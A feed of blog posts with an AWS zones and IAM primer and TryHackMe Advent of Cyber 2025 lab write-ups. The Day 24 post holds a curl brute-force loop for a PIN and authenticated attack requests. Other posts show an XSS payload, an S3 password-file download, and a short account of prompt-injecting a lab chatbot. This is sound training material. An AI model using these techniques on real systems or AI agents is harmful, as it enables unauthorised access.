DEV Community: Mahin Ahmad

AWS Regions, Zones and IAM

Mahin Ahmad — Wed, 04 Feb 2026 08:27:40 +0000

Lets start with the concept of data centers: stacks and stacks of server hardware built with high speed RAMs, powerful CPUs and low latency storage drives running 24/7/365. They host the websites you visit, enterprise company data and pictures of the moon that you took with your ~~budget~~ phone!

Relying on only one datacenter is not enough redundancy-wise. This is where AWS defines their 'Availability Zone' concept. 1 AZ = 1 (or more) data center acting as a single logical unit. What's behind that 'single logical unit'? the promise of AWS Cloud's service guarantee that it will always work, officially called a 'Service Level Agreement'.

This is what it looks like: Suppose after some downtime and disruption incidents, the AWS storage service S3 had an uptime of (less than) 95% in January, then you get 100% ~~refund~~ credit for the next monthly billing cycle.

Despite proper backups, nobody can prevent a city-wide natural calamity or man-made crisis. To ensure close to 100% uptime, we as the user can also choose to host our websites or storage in multiple availability zones. For example: the Mumbai Region has three availability zones. If we keep our resources in all three AZ, though more pricier, we can ensure closer to 100% uptime.

AZs are designed not to be simultaneously impacted by a shared fate scenario like utility power, water disruption, fiber isolation, earthquakes, fires, tornadoes, or floods. Common points of failure, like generators and cooling equipment, are not shared across Availability Zones and are designed to be supplied by different power substations.

Read More about AZs
Also note that in a new aws cloud account, not all regions and availability zones will be available by default. We have to manually turn them on. Its not an issue unless you are looking for a zone closer to your user base for your latency sensitive boutique flower shop's online service!

Some new features appear some regions first.

Some AWS services are zone-specific, region-specific or global. Meaning while configuring them you have to be mindful under which zones/regions you are deploying them or setting particular rules.

Like Amazon EC2 and Amazon EBS, A zonal service is one that provides the ability to specify which Availability Zone the resources are deployed into. These services operate independently in each Availability Zone within a Region, and more importantly, fail independently in each Availability Zone as well.

Note that, if the AZ suffers downtime, the EC2 instance and the attached block storage(EBS) also goes offline (not corrupted/destroyed, depending how severe the AZ failure was). This is called 'static stability', meaning AWS will not automatically/dynamically move the EC2 instance to another AZ and ensure EC2 is up. We have to do it ourselves e.g. select more than 1 AZ if 100% uptime is crucial.

Regional services are services that AWS has built on top of multiple Availability Zones so that customers don’t have to figure out how to make the best use of zonal services. We logically group together the service deployed across multiple Availability Zones to present a single Regional endpoint to customers. Amazon SQS and Amazon DynamoDB are examples of Regional services. They use the isolation and redundancy of Availability Zones to minimize infrastructure failure...

Beyond Regions and Availability Zones there are also the concept of AWS Local Zones (infrastructure set up closer to large populations) and Point-of-Presence ~~colloquially~~ also known as 'edge locations' which host 3 key AWS service: Amazon CloudFront, a content delivery network (CDN); Amazon Route 53, a public Domain Name System (DNS) resolution service; and AWS Global Accelerator (AGA), an edge networking optimization service. Read more.

IAM: Identity Access Management

Moving the discussion away from 'where our resources and workloads run', our next concern should be who can do what, also known as Authorization. Authentication and Authorization is covered under a suite of concepts and tools called IAM.
Lets start from square one. When you try to login to your aws cloud via "console.aws.amazon .com/console" you are presented with a login panel which mentions two types of accounts:

IAM user
Root user

A root user, which can do anything, can spawn(make) many IAM users and specify what they can/cant do. You dont want your company's data analyst working with full priviledge to destroy everything, instead of only limited read and write permission. You can also create a user group and place many of the same types of users under it. This helps reduce click operations and good management.
Note that we are using the 'IAM' jargon freely here! The entire AWS service and the account type are also called 'IAM'. Dont think about the jargons for too long, just go with it!

Below is what a IAM setup could look like, read from left:

This is what an IAM user would see after login. There will be some access denied flags depending on what permission they have been given.

Screenshot taken from youtube video by Mr. Mitul Shahriyar, an AWS Community Builder.

AWS IAM has these concepts that we will discuss in short. The best way is to actually browse and DIY.

To be contd...

Advent of Cyber 2025 Day 21 22 23 24 Final Writeup & Bonus Question | TryHackMe

Mahin Ahmad — Sat, 03 Jan 2026 09:40:25 +0000

Day 21: Malware Analysis: HTA apps

👉Room Link
You can use the Attackbox or just download the 'malicious' file. Do not run it. Open your text ediltor and open the file(drag and drop the file or ctrl+o)

Task 2 questions are relatively easy. This is a hard one:

The HTA is enumerating information from the local host executing the application. What two pieces of information about the computer it is running on are being exfiltrated? You should provide the two object names separated by commas.
=>You can find it inside provideFeedback vba function! Just ctrl+f to find this string in the hta file.

Next question: What endpoint is the enumerated data being exfiltrated to?
Meaning the malware is getting those information and passing this to where? That's 2 lines down the last question.

What HTTP method is being used to exfiltrate the data?
=> GET, a 3 letter word.

What is the line of code that executes the contents of the download?
=> The line that starts with 'runObject.Run' 🙂

What popular encoding scheme was used in an attempt to obfuscate the download?
=> MD5, Base64 are pretty Popular

Decode the payload. It seems as if additional steps were taken to hide the malware! What common encryption scheme was used in the script?
=> Can't say base64 this time. From the vba programming it is apparent that letters were shifted. ROT13 is the answer.

=> Because ROT13(a cyclic algorithm) was used to encode, the algorithm to decode the string is also ROT13.

Now the most important question, its the optional question!

For those who want another challenge, download the HTA file from here to get the key for Side Quest 4, accessible through our Side Quest Hub. The password for the file is CanYouREM3?.

Day 22: C2 = Command & Control

👉Room Link
Just like attackers have a wide range of tools in their arsenal, defenders also have many tools, frameworks, end-to-end solutions etc.

Throughout Advent of Cyber, we have been acquainted with Splunk, Burp Suite Community Edition, the DevTools!, YARA and now RITA (Real Intelligence Threat Analytics).

Note: You are supposed to see a GUI, if not the click this:

RITA interfaces with zeek tool. Usually, a network activity can be recorded into a 'pcap file' format. But for today's use case we have to convert PCAP files to "Zeek logs": zeek readpcap pcaps/AsyncRAT.pcap zeek_logs/asyncrat command follows the format zeek readpcap inputFile outputDir

Then using RITA: rita import --logs ~/zeek_logs/asyncrat/ --database asyncrat

We are simply analyzing the logs and making a new database we named 'asyncrat'. Now we can browse through this 'result database' with rita view asyncrat

Note that you should open the VM in a new tab to see the rita view asyncrat output properly. There is an expand icon in the lower bar.

To answer the questions we need to analyze a different file rita_challenge.pcap.

How many hosts are communicating with malhare.net? => Count the lines in 'rita view databasename`
Which Threat Modifier tells us the number of hosts communicating to a certain destination? => scroll up the literature in 'Threat Modifier' section.
highest number of connections to rabbithole.malhare .net? => Use the arrow key and find the max "Connection Count":
Which search filter would you use to search for all entries that communicate to rabbithole.malhare .net with a beacon score greater than 70% and sorted by connection duration (descending)? => Refresh your memory by reading the Search bar section again in THM room.
communicate to rabbithole.malhare .net : dst:rabbithole.malhare.net
beacon:>=70 beacon score equal or greater than 70%
sorted by connection duration (descending): sort:duration-desc
Dont type in the VM, I find it slow. Type the entire thing here and paste into VM's RITA search bar.
Which port did the host 10.0.0.13 use to connect to rabbithole.malhare.net?
=> Bro just use the arrow keys and read the panel on the right

Day 23: AWS Security

👉Room Link
If you have never worked with AWS, no worries; just read through the very friendly THM literature.

Basically, AWS allows us to control our infrastructure resource programmatically via access keys, much like "api keys". We are authorized through environment variables that hold these keys, ensuring you have the necessary permissions.

Another very useful tool is the AWS CLI, which allows you to run AWS commands directly from your terminal and provision/manage your infrastructure. For example: aws ec2 run-instances to privision(create) a VIM(EC2 instace); aws sts get-caller-identity displays details about the IAM identity

Dont make my mistak in task 1! Actually run the command in the Target Machine VM:

Task 4 Question: Apart from GetObject and ListBucket, what other action can be taken by assuming the bucketmaster role?
=> Note that you have to assume the role of bucketmaster from the prevous task. Make sure to follow all the steps including exporting the new Access Keys.

lists the bucket and its objects.
To view the specific object(file) cloud_password.txt you also have to mention this as the 'key' argument:
see example in aws docs

aws s3api get-object --key cloud_password.txt --bucket easter-secrets-123145

This command is still incomplete. This we also have to type a 'filename' because this is basically a download operation.

I tried typing just - to show the it to the standard output, rather than saving to disk; but it didn't work. It showed the metadata instead:

cpass.txt is the downloaded 'cloud_password.txt' file:

Day 24: Exploitation with cURL

👉Room Link

A little bit of legendary history hurts nobody:

It gets cooler!

Curl is basically a command line tool to talk to other machines by sending http requests and many more.

Task 2 Questions:

Make a POST request to the /post.php endpoint with the username admin and the password admin. What is the flag you receive? => You will not get through if you try to be smart and use a user-agent header, because the task wants you to use the terminal, without any user-agent header.
Make a request to the /cookie.php endpoint with the username admin and the password admin and save the cookie. Reuse that saved cookie at the same endpoint. What is the flag you received? => First Login: curl -c cookie.txt -X POST -d "username=admin&password=admin" http://10.49.172.12/cookie.php Then simply use the cookie and send an empty GET: curl -b cookie.txt http://10.49.172.12/cookie.php
Just follow THM steps.
Make a request to the /agent.php endpoint with the user-agent TBFC. What is the flag your receive? => curl -A "TBFC" -s http://10.49.172.12/agent.php

Bonus Question:
Need to "identify endpoints, authenticate and obtain the operator token, and call the close operation."

curl -A "secretcomputer" http://10.49.172.12/terminal.php?action=panel

Note that our final goal is the 'close the portal'

But we need 3 things: session, operator token and X-Force header

Step 1: brute force the /login endpoint
You can use the old script in the THM room. or even ask GPT to make you a script that will utilize all the cpu cores!

Running the script with rockyou.txt
If you are not in the attackbox, then download it from here and extract the text file using gunzip rockyou.txt.gz

Go Outside and 𝔗𝔬𝔲𝔠𝔥 𝔤𝔯𝔞𝔰𝔰. 🌿🌱🍃

Step 2: Guess the PIN
Notice the /pin endpoint that gives us a temporary admin token. THM says the pin is between 4000 and 5000.

It's important to know that exploring and tinkering are the number one steps to break into anything. Expecting that there is a linear, step-by-step approach is a mistake.

If we 'fool around' we get a suggestion on how to attempt a pin value, compared to the "username=admin&password=admin" approach

`bash

for pass in $(seq 5000 -1 4000); do
# echo "Trying password: $pass"
resp=$(curl -sA "secretcomputer" -X POST -d "pin=$pass" http://10.48.172.152/terminal.php?action=pin)
if ! grep -q "fail" <<< "$resp"; then echo "$pass is the pin"; echo $resp; break; fi
# echo $resp
done
`

Note the type of user: operator . Does this mean we should bruteforce the login endpoint with username=operator? I'm writing this early by the way, step 1 is taking too much time, there are 14,344,391 different passwords to try!

Remember what happens when we try the /close endpoint? We require three things: admin Session, operator token, and X-Force header.

The brute force is taking so much time that i have to look into a solution video 😑 Dude uses a tool called ffuf on a partial rockyou.txt. After an hour the script is at 121,000th password. The correct password "stellaris61" is at line 3,537,735!

We will save the session in our machine with -c flag.
curl -A "secretcomputer" http://10.48.172.152/terminal.php?action=login -X POST -d "username=admin&password=stellaris61" -c session.txt

Now we can hit the /close endpoint with our 'admin session' and our 'opertor token'! Need to figure out the custom X-Force header, lets try 'true' value?

curl -A "secretcomputer" http://10.48.172.152/terminal.php?action=close -X POST -d "username=admin&password=stellaris61&operator_token=7dce601fc5cf86aae78f1471e5af3220956de91cefd714e2ff399da426a79ced" -b session.txt -H "X-Force: true"
There is a mistake on how we used our operator_token. Following is the accurate way.

The reason I use the status endpoint is that the close endpoint is not very friendly regarding which specific value is actually invalid.

X-Force value is not obvious at first, but tryhackme says mentions this, kuddos to that youtube channel.

And finally the reason of the meme:
Entries for the Giveaway can be submitted from December 1st 2025 to December 31st 2025, by completing rooms.

Onwards and upwords...

Advent of Cyber 2025 Day 13-20 Writeup Sprint! | TryHackMe

Mahin Ahmad — Fri, 02 Jan 2026 11:29:53 +0000

Day 13: YARA!

YARA is a tool to collect digital footprints, like in physical world where forensic people use tools to collect fingerprints.

We define the rules about what a malicious behavior should be.

A rule file consists of several parts: meta, strings, condition. meta is for the author, in case there are 100s of files to maintain. strings are what yara will look for in the malware files; we can use regex here. condition is how yara should look for them.

rule TBFC_Simple_MZ_Detect
{
    meta:
        author = "TBFC SOC L2"
        description = "IcedID Rule"
        date = "2025-10-10"
        confidence = "low"

    strings:
        $mz   = { 4D 5A }                        // "MZ" header (PE file)
        $hex1 = { 48 8B ?? ?? 48 89 }            // malicious binary fragment
        $s1   = "malhare" nocase                 // story / IOC string

    condition:
        all of them and filesize < 10485760     // < 10MB size
}

The task is this:

It's time to complete the practical task! The blue team has to search for the keyword TBFC: followed by an ASCII alphanumeric keyword across the /home/ubuntu/Downloads/easter directory to extract the message sent by McSkidy. Can you help decode the message sent by McSkidy?

We have to:

Make a yara rule to search for the string TBFC:

rule search_for_TBFC
{
        meta:
                author = "mahin THM Day13"
        strings:
                $st = "TBFC:" ascii
        condition:
                $st
}

My strings section is not correct, 'ascii' is redundent, but it does the job! the question required this: $st = /TBFC:[A-Za-z0-9]+/

Next step is to apply this yara rule: yara -rs rule.yar ~/Downloads/easter/

This screenshot has the answer to the last question "What is the message sent by McSkidy?"

Day 14 Containers

Goal is the fix the defaced website of the fictional service named 'doordasher'. We have to explore the container layer of the infrastructure.
docker ps command shows the table with all the apps that are running. Notice the image column highlighted in yellow. There are three app containers that are running.

5001 port hosts the doordash app. 5002 port hosts the news app wareville-times, part of the bonus question.

Bonus question:

There is a secret code contained within the news site running on port 5002; this code also happens to be the password for the deployer user! They should definitely change their password. Can you find it?

The clue is in the question. Go to the website http://10.48.153.34:5002/ and look at the news page. Notice that some words are highlighted differently. 💤😴

Day 15 Web Attack Forensics in Splunk(again...)

Room Link
Turn on the TargetBox and go to this address in you local laptop: TargetMachineIpAddress:8000/en-US/app/search/search

index=windows_apache_access (cmd.exe OR powershell OR "powershell.exe" OR "Invoke-Expression") | table _time host clientip uri_path uri_query status searches the web access logs for any HTTP requests that include signs of command execution attempts, such as cmd.exe, PowerShell, or Invoke-Expression
index=windows_apache_error ("cmd.exe" OR "powershell" OR "Internal Server Error") checks for Apache error logs for signs of execution attempts or internal failures caused by malicious requests
What if the attacker tried to create suspicious processes? index=windows_sysmon ParentImage="*httpd.exe"

The hints are in the THM walkthrouh really.
"the encoded payload (such as the “Muahahaha” message) never ran."
=> The base64 decoded string says: T�h�i�s� �i�s� �n�o�w� �M�i�n�e�!� �M�U�A�H�A�A�H�A�A� (aka This is now mine muhahauah) which attempted to run from powershell.exe, seen from Splunk results.

Day 14

Room Link
In this room we have to deep dive into 'registry explorer' tool.

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist` : It stores information on recently accessed applications launched via the GUI.
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths` : It stores all the paths and locations typed by the user inside the Explorer address bar. HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths It stores the path of the applications.
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery` : It stores all the search terms typed by the user in the Explorer search bar. HKLM\Software\Microsoft\Windows\CurrentVersion\Run It stores information on the programs that are set to automatically start (startup programs) when the users logs in.
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs : It stores information on the files that the user has recently accessed.
HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName : It stores the computer's name (hostname).
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall : It stores information on the installed programs.

What application was installed on the dispatch-srv01 before the abnormal activity started? => From the bullet points above we know we should look here: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall But first we have to import the relevant hive file: Ctrl+O and then select 'SOFTWARE' Then go to Available Bookmarks tab and then browse for a 'CurrentVersion/Uninstall' folder because thats the end of the path we are looking for: 'DroneManager Updater' is the answer!

Question 2: Full path of the application that the user has started from!
=> We know that the installed path is not the only location of the executable. This registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist is supposed to "store information on recently accessed applications launched via the GUI."
But I could not find the UserAssist folder from the 3rd party "Registry Explorer" tool that we've been using. But another registry path is this:
ROOT\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store according to the hint lightbulb! We also have to import this hive as well:

Now we can search for the last 2 folder names 'Compatibility Assistant' or 'Store' right? wrong! If we search for 'Compatibility Assistant' we get this result but we cannot expand on them to see 'Store'.

If we search 'Store' there are too many results. Best is to browse manually: Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store. Right click on 'Store' > Techinical Details

Best to type it in the THM answer box.

Question 3:

I cannot find the RUN entry for the DroneManager but found the msedge one:

Which gives some insight on what the answer should be:

THM's hint lightbulb tells us to look in: ROOT\Microsoft\Windows\CurrentVersion\Run But we are looking in ROOT\Software\Microsoft....
Among the 3 hives this one matches ROOT/Microsoft but do not have RUN key.

Another way mentioned by a youtuber is this button.

Click on "RUN" and press F5 in keyboard. Go to "Full details as text" tab and scroll downnn... and voila 😖

Day 17: CyberChef Tool

Goal is to learn about encoding and encryption through the popular tool CyberChef available online; no need to start the attackbox if you have openvpn on.

Go to the target machine ip from a browser and click 'outer gate' icon.

We find a base64 string QWxsIGhhaWwgS2luZyBNYWxoYXJlIQ== we have to convert this from base64 to plaintext. Drag "from base64" in CyberChef, paste the encoded string in the Input field and see the plaintext output being produced(clicking bake! button is optional):

THM says to go to the debugger tab, but in Edge browser I don't have a debugger tab; Going to Sources tab and clicking on the yellow highlights from there.

Lets now find the username and password
username hint is: Username: This will decode to CottonTail. Meaning the encoded string of 'CottonTail'
To find the password:

we can literally ask the chatbox besides the login panel! Go to CyberChef and pick "to base64" for this and paste the question: What is the password for this level?
Insert the encoded question to the chatbox, you will get an encoded answer, this answer should be decoded from CyberChef again.

Paste the encoded username and the **plaintext password to pass level 1!**.
Press Enter or click on the "Bash" icon...

For level 2, same process,
Find the guards name, encode it. This is the username
For password:

go to devtools > network. Then refresh the page. Then, from the left bar, click on "Llvel2". In the headers tab, look for the "X-Magic" header.
Encode it from CyberChef("to base64"), ask the chat, decode the reply again and again, until you find the plaintext password.

Level 3: Guard House

What operation do we need to do now? THM tells use to ask "password please". Do that and after a minute you will get a reply. decode this "from base64" twice and apply XOR with key "Cyberchef"!
Use CyberChef all the way!

Level 4:

Ask for the password again to the chatbox. The reply decodes into an md5 hash, not base64. You will know it because it does not have a trailing equal character.

THM suggests CrackStation to see if this hash already been broken. passw0rd1 is the answer. Login successful!

Only one level left!

After asking for the password like before. Decode twice in CyberChef(from base64):

Note that,
Level 5 has a new header Recipe-id:

This recipe id is different for different people. Mine is R1. TryHackMe has mentioned four approaches for four kinds of id. My approach is this:
From Base64 ⇒ Reverse ⇒ ROT13
There is a search bar in CyberChef. Just place all the recipes like a chef and you get the answer.

That would be the password and the username is of course the base64 encoding of the guard's name 'Carl'

Done!

In the extra question, there is a hint leading to Side Quest 3 access key:

Looking for the key to Side Quest 3? Hopper has left us this cyberchef link as a lead. See if you can recover the key and access the corresponding challenge in our Side Quest Hub!

Day 18 Obfuscation

Obfuscation is the practice of making data hard to read and analyze. Attackers use it to evade basic detection and delay investigations.

Its easy to debunk(de-obfuscate) obfuscated code once we know what algorithm has been used. If it's not obvious then CyberChef has a "Magic" button that tries to detect on its own:

Go to the Target Machine GUI > click on windows search type 'code' to open 'visual studio code'.
Open the SantaStealer.ps file and look at line 15 & 16. Fix line 16 from cyberchef above.
open powershell in the same way. cd Desktop and then ./S[TAB] to run the script, get the flag!

For 2nd flag, read from line 20.
Go to cyberchef, use XOR and HEX recipe, notice the delimiter.

And we are done!

Day 19: ICS/Modbus

You may not know about ICS or Modbus or PLC jargons even if you are in the cybersecurity field. These are some protocols used in industrial operational technology (OT) systems rather than IT systems.

This is called a 'walkthrough room'. There is nothing to solve except to follow the guidelines step by step. Run the python code to get the flag.

Note that start the machines only after you reach the actual task because the reading material will take proper time.

Day 20: Race Conditions(no, not an actual race!)

👉 Room Link
There are three types of race conditions:

Time-of-Check to Time-of-Use: An ecommerce web server checks the database for an item, only 1 left, and shows it to a buyer. The buyer places it in the cart and proceeds to pay. A second buyer also visits this item, adds it to the cart, and buys it earlier than the first buyer! The website should have placed a condition to lock the last item as soon as someone adds it to their cart temporarily.
Shared resource: A bank account(say 100 bitcoins!) is affected by two transactions: one credit(+20) and another debit(-20). If the system is very primitive logic then the result depends on which one finishes last, creating confusion. The credit transaction will add 20 to 100 = 120. The debit transaction will subtract 20 from 100 = 80. Hence The result will be either 120 or 80; though it should be just 100!
Atomicity Validation: When a sequence of operations is considered part of a single transaction, it is supposed to be atomic. Meaning either all of them should successfully run without error or neither of the operations should run at all. Suppose in a business transaction, there are three database operations to be performed. For example:
Adding an amount to a bank account
Subtracting from another person's account
Sending confirmation If someone presses cancel midway, say step2, then all steps should revert back to step 0. This is called atomicity. If the entire process does not revert back to square one, then we say 'the system does not have atomicity'.

Start the attack box. Alternatively, if you already have OpenVPN turned on and have the Burp Suite Community Edition, you don't need the attack box.
Start the Burp Suite, turn of intercepting and from burp suite open a browser.

If you get this dialog saying "Allow browser to run without sandbox". Do this:

A chromium browser will slowly pop up. THM tells us to open Firefox and go to machine.IP.address, but actually we have to this in this chromium browser we opened. Purchase one unit of 'sleightoy'. Then go to Proxy tab > 'http history' sub-tab in Burp Suite.

Read from the "Exploiting the Race Condition" section in THM room.

Second Question: Do the same for the item 'bunny plush'

Start the browser from Burp Suite(already open)
Make an order of 'bunny plush'
Go to Proxy tab > HTTP History Tab
Select 'payment checkout' > Right click and 'send to Repeater'
Make a group with the tab.
Duplicate the tab 20 times.
Press the dropdown in orange 'Send button' > Click "Send group in parallel"
Click again.
Go to the browser again and see the flag.

Advent of Cyber 2025 Day 12 Writeup: Phishing | TryHackMe

Mahin Ahmad — Wed, 31 Dec 2025 07:27:48 +0000

👉 Room Link
Let's clarify Spamming vs Phishing:

Spam focuses on quantity over precision. Unlike phishing, which aims to deceive specific users, spam messages are sent in bulk to flood inboxes with unwanted marketing or irrelevant content. Their goal isn’t usually to steal data, but to push exposure or engagement, Promotions, clickbait or even data harvesting.

Other jargons include:

Social Engineering: Rather than hacking technology, connecting with someone on a personal level to lure out important data. You can look for the following approaches to see if someone might be using social engineering: Impersonation, Sense of urgency, Side channel(telling that "hey, we moved our helpline to this new number"! etc.
Typosquatting and Punycode: тrуhackme.com written with Cyrillic т, Cyrillic г, Cyrillic у
Spoofing: An email's "From" field can look legit. But actually its coming from a different server. Spoofing checks on the mail server should always be on. Inspecting 'header fields' such as Authentication-Result and Return-Path.
Malicious Attachments: And there's always the classic way to just attach the malware in the email because someone will always click on stuff no matter what
Legitimate Application: Attackers can also hide behind trusted services, such as Dropbox or Google Drive, and share a PDF or document file containing fake content and malicious code.
Fake login pages.

Task Questions:

Classify the 1st email, what's the flag?
=> Go to the target machine IP and click on the first email. Scroll down...

Is it a spam or a phishing attempt? The email is asking to make a payment from paypal, definitely phishing; Submit and find out!

From the header, we know that even though the email says paypal.com, it is actually not from paypal.com but from someone else. That is why we can tick mark spoofing and fake invoice. And also tick mark 'urgency' because 'santa sending invoice' is supposed to be urgent!
And finally submit to get the flag.

Classify the second email. The email is a audio attachment, the from field says <calls@tbfc.com> But in the 'inspect' section, the 'from header' is different: gibberish.outlook.com

Hence, Spoofing, Impersonation and malicious attachment are the correct answer.

The 3rd email comes from a gmail address and says:
McSkidy here — I'm currently unreachable by phone. We have an ongoing incident and need the Blue Team to get remote access now to investigate. Please create a new VPN access for me immediately. Send the access to my personal email address.
=> Impersonation, sense of urgency and social networking!

The 4th email says:
TBFC HR Department (hr.tbfc@outlook.com) invited you to view the file "Annual Salary Raise Approval.pdf" on Dropbox.
"Hi there, You have a pending document to be signed regarding you recent Salary Raise Approval. You can copy and paste the URL below if you do not have a DropBox account: https://www.dropbox.com/scl/fi/xzruzfwqa4w77ozxvq00i/annual-salary-raise-approval.pdf?blablablabla Thank you, TBFC HR Department"

It comes from external domain(dropbox), social engineering and impersonation. Dont know why malicious attachment is not the other answer.

The 5th email is a promotional campaign. Just mark it as spam.

The last email to classify contains cursive letters, meaning it is not from our domain.

Typosquatting/Punycodes, Impersonation are correct. But Malicious Attachment is not correct answer, Social Engineering is.

Onwards and upwords...

Advent of Cyber 2025 Day 11 Writeup: Cross-Site Scripting (XSS) | TryHackMe

Mahin Ahmad — Tue, 30 Dec 2025 13:10:02 +0000

Usually, a website or web app displays information from the server. However, as users, we can also provide information to the website via an input field. If a web server does not have appropriate user input validation, then malicious users can inject malicious code rather than harmless text. this malicious code will then execute and steal credentials, deface pages, or alter user information.

Stored XSS attack: Lets say upon user input, the malicious code is now saved in the server e.g. html or js file of this website: domain.com/tonybennet. Then whoever later visits this page will become a victim of this attack. The code will run for anyone who visits that page.

Reflected XSS is more direct. Someone hands you a valid link: facebook.com/profile/search?term=<script>alert(1)</script> You clicked on it because its from facebook.com! If facebook server is vulnerable to this type of reflected XSS then you will become victim of this attack. Your browser will run the javascript code alert(1) or any other malicious code for that matter.

Protecting against XSS:

Disable dangerous rendering paths: Instead of using the innerHTML property, which lets you inject any content directly into HTML, use the textContent property instead, it treats input as text and parses it for HTML.
Make cookies inaccessible to JS: Set session cookies with the HttpOnly, Secure, and SameSite attributes to reduce the impact of XSS attacks.
Sanitise input/output and encode: In some situations, applications may need to accept limited HTML input—for example, to allow users to include safe links or basic formatting. However, it's critical to sanitize and encode all user-supplied data to prevent security vulnerabilities. Sanitising and encoding removes or escapes any elements that could be interpreted as executable code, such as scripts, event handlers, or JavaScript URLs while preserving safe formatting.

Start the target machine. Type the ip address in your browser if you have OpenVPN enabled; if you dont, start the Attackbox machine.

Notice there are some input boxes. We can start there. This is what reflected xss looks like when we put malicious code in the input box:<script>alert('Reflected Meow Meow')</script>

Usually we first check if an input box is susceptible to XSS or not. Today's room is very easy, there are two input boxes for two kinds of XSS. Copy and paste them to get your flags.

Advent of Cyber 2025 Day 10 Writeup: SOC Alert Triaging | TryHackMe

Mahin Ahmad — Mon, 29 Dec 2025 13:00:45 +0000

👉Room Link

Today we have to login into Microsoft's cloud platform called Azure. There are multiple access pass available in case Azure blocks the accounts for suspicious activity!. usr-aoc25-eu@tryhackme.onmicrosoft.com email worked for me.

Today's tasks focuses on Triaging in the face of a digital attack. From the SOC tool we can see all kinds of logs and infiltrations done by foreign actors.

Fast Response:
Analysts should priorities first. Filter by security level(How bad?), timestamp and frequency, attack stage(Where in the attack lifecycle), and affected assets(what or who is affected).

Deep Dive Steps:

Investigate the alert in detail
Check the related logs
Coordinate multiple alerts
Build context and timeline
Decide on the following action
Document findings and lessons learned

Example Scenario of Deep Dive Steps:
An SOC receives an alert: “Multiple failed login attempts followed by a successful login”.

Step 1. Alert checking

The analyst opens the alert and reviews the details.
Entity: user j.doe, source IP 203.0.113.45
Detection logic: 10 failed logins within 5 minutes, then 1 success
Initial assessment: This could indicate a brute-force attempt. The analyst confirms the behavior is suspicious and not explained by a known system process.

Step 2. Log checking

The analyst checks authentication logs from the identity provider and VPN.
Finds repeated failed login events from the same IP, followed by a successful login at an unusual time.
Notices the IP is from a country where the user normally does not log in.

In the azure portal, once you have logged in search for Sentinel and click the workspace called 'law-aoc2025'

Click Logs and then you will see an introductory video; click on the cross icon, and then you will see a query editor like this.

Click on this table icon and look for syslog-cl

When you click on the log table 'syslog_cl', you will see "no results". We need to increase the time range.

This is how we can pull up the logs form our cloud SIEM tool that is Microsoft Sentinel.

Microsoft Sentinel, a cloud-native SIEM and SOAR platform, collects data from various Azure services, applications, and connected sources to detect, investigate, and respond to threats in real time.
Through Sentinel, McSkidy can view and manage alerts, analyse incidents, and correlate activities across multiple logs. It provides visibility into what's happening within the Azure tenant and efficiently allows analysts to pivot from one alert to another.

Next is to analyze the incidents. Below "Logs", click on Incidents. You may see that its empty; refresh the page and you will see a 'different incident page' (dont worry thats just how microsoft is 😑)

Choose 'last 30 days' to see some incidents...

The column Incident number and dates are a little different than TryHackMe's literature. It does not matter, click on the High severity alert and see the details in the right sidebar.

We will focus on this question:

Note that the alert's name is: "Linux PrivEsc - User Added to Sudo Group". Search for this in the searchbar:

I could not find how many accounts were added to the sudoer group, searched for other people's blogs but they just listed the single digit answer, not how they found it!

You can click the blue 'view full details' button.

I even went to the investigation graph! But 3 is not the answer.

4 is the answer :)

Task 5:
I could not follow this instruction, the event is not clickable:

If we go back to the alert's full details view, we can try clicking the Events from the Evidence section.

Skipping down, open the query editor in KQL mode:

Copy paste the KQL query from THM, But change two things. The time range(in red arrow) and the date(yellow)

Task 5 Questions:

What is the name of the kernel module installed in websrv-01?
- You can search for 'kernel'
What is the unusual command executed within websrv-01 by the ops user?
- Search for 'ops' but you will also have to edit the query. Replace 'app-02' with 'websrv-01'.
Same approach for other questions. Search for sudo, ssh etc and change the KQL accordingly.

This took longer time than I thought... onto the next one!

Advent of Cyber 2025: Day 8 & 9 Writeup Prompt Injection | TryHackMe

Mahin Ahmad — Sun, 28 Dec 2025 07:00:14 +0000

👉 Room Link

LLM breakthrough have unlocked a new field of AI called Agentic AI! It can accomplish a goal with minimal supervision with a planned approach. Think of a travel agent. You tell them you're going to spend five days in the Maldives and then they manage all the required steps: 1. Applying for a visa 2. Booking airplane tickets 3. Arranging accommodation

Agentic AI is not a novel idea. Before LLM-based AI hype, there was/is a similar field called RPA ie. Robot Process Automation

Read all the literature in the THM room; how LLM agent tries to accomplish a task with minimal hallucination with 'Reason and Act' (ReAct) approach. Also how these processes can be compromised by attackers.

The use of AI in different fields has opened the door to new types of weaknesses. When an AI agent follows a process to complete its tasks, attackers can try to interfere with that process. If the agent is not designed with strong validation or control measures, this can result in security issues or unintended actions.

Our goal today is to chat with an LLM and make it give out information it was not supposed to reveal, much like that 'psycho friend' you have in your circle who always asks leading questi🤬ns (sorrynotsorry)!

Go to Target Machine IP from the browser(Either from the Attackbox or your local browser if you have openvpn on)

How the chatbot is processing our sentences and formulating a reply is called 'Chain of Thought'. Unlike chatgpt, we can click on 'thinking' button and see the CoT.

Follow the steps in THM room...

If the calender is not updating from 'eastmas' to 'christmas' then try a few more times:

You will find the flag in the calender on the 25th date.

Day 09 Writeup Passwords Cracking

Room Link
Warning: This is educational purposes only, not to be utilized for personal gains.

Follow the THM room's instructions. Turn on the Target Machine and the Attackbox. We have to gracefully guess the password of two files: file.pdf and file.zip; using linux commands.

Though there are mentions of gpu utilization and everything, today's tasks are fairly easy to follow:

You can use mouse right click on zip file > extract now and paste the password from john command output.

Advent of Cyber 2025: Day 7 Writeup Network Discovery - Scan-ta Clause | TryHackMe

Mahin Ahmad — Thu, 25 Dec 2025 04:51:15 +0000

Hellow! Lets get to it fast! 👉 Room Link

You have to start the target machine. And if you dont have the openvpn in your own machine, start the attackbox too.

Today's learning objectives:

Learn the basics of network service discovery with Nmap
Learn core network protocols and concepts along the way
Apply your knowledge to find a way back into the server.

The plot is that our server access has been compromised and we now have to perform counter-attacks! We know the ip address, let's start scanning first.

